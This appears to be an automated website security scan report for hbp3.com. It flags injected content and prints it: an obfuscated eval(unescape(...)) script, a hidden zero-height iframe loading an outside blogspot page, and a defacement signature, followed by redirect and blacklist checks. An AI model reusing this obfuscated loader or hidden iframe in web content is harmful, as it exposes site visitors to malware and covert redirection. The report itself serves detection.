Scanned pages/files
Request | Server response | Status |
http://hbp3.com/ | 200 OK Content-Length: 5860 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(unescape('%66%75%6e%63%74%69%6f%6e%20%75%39%39%36%38%61%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%37%32%32%34%39%31%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%39%35%31%32%34%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%7 ...[1075 bytes skipped]... Decoded script: ...[1438 bytes skipped]... e%1a%6c%65%1a%1c%68%5a%6a%63%62%6e%66%66%63%63%6c%74%3b%1d%29%68%72%1b%18%69%5a%6a%63%6f%6e%75%64%65%74%62%3e%1a%2e%69%70%18%14%6e%5f%68%66%3f%18%5b%6c%69%5a%65%18%14%75%6e%62%3e%1a%62%75%74%6e%33%29%2b%26%64%5f%74%6e%69%58%62%6c%61%2f%5a%6e%65%61%71%6f%68%74%2c%64%69%69%1b%18%77%78%73%68%60%3e%1a%58%68%6a%62%66%6a%30%14%28%6c%77%19%25%44%47%46%40%47%46%1a%62%69%6a%60%3c%1a%3c%3d%29%65%67%6a%59%63%67%3a7224910%35%37%34%35%33%34%35')); <iframe width="100%" height="0" frameborder="0" scrolling="no" marginheight="0px" marginwidth="0px" name="blmac" src="http://2daymobile.blogspot.com" style="border: 0px #FFFFFF none;"></iframe> Deface/Content modification. The following signature was found: Hacked by Spid3r <head>
<title>Hacked by Spid3r</title> <link rel="SHORTCUT ICON" type="image/x-icon" href="https://scontent-a-ams.xx.fbcdn.net/hphotos-prn2/t1.0-9/10320422_1392463094373475_56069615978506468_n.jpg"> <meta content='Hacked By Spider' name='description'/> <meta content='Spid3r,Hacked By spider,Defaced by blackface team,spider Was Here,hacked' name='keywords'/> <meta content='--Spider---' name='Auth ...[6881 bytes skipped]... | ||
http://hbp3.com/test404page.js | 200 OK Content-Length: 5860 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(unescape('%66%75%6e%63%74%69%6f%6e%20%75%39%39%36%38%61%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%37%32%32%34%39%31%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%39%35%31%32%34%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%7 ...[1075 bytes skipped]... Decoded script: ...[1438 bytes skipped]... e%1a%6c%65%1a%1c%68%5a%6a%63%62%6e%66%66%63%63%6c%74%3b%1d%29%68%72%1b%18%69%5a%6a%63%6f%6e%75%64%65%74%62%3e%1a%2e%69%70%18%14%6e%5f%68%66%3f%18%5b%6c%69%5a%65%18%14%75%6e%62%3e%1a%62%75%74%6e%33%29%2b%26%64%5f%74%6e%69%58%62%6c%61%2f%5a%6e%65%61%71%6f%68%74%2c%64%69%69%1b%18%77%78%73%68%60%3e%1a%58%68%6a%62%66%6a%30%14%28%6c%77%19%25%44%47%46%40%47%46%1a%62%69%6a%60%3c%1a%3c%3d%29%65%67%6a%59%63%67%3a7224910%35%37%34%35%33%34%35')); <iframe width="100%" height="0" frameborder="0" scrolling="no" marginheight="0px" marginwidth="0px" name="blmac" src="http://2daymobile.blogspot.com" style="border: 0px #FFFFFF none;"></iframe> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hbp3.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jul 2015 19:31:07 GMT
Server: nginx/1.8.0
Content-Type: text/html
GET / HTTP/1.1
Host: hbp3.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jul 2015 19:31:07 GMT
Server: nginx/1.8.0
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: hbp3.com
Referer: http://www.google.com/search?q=hbp3.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hbp3.com
Referer: http://www.google.com/search?q=hbp3.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hbp3.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hbp3.com/
Result: hbp3.com is not infected or malware details are not published yet.
Result: hbp3.com is not infected or malware details are not published yet.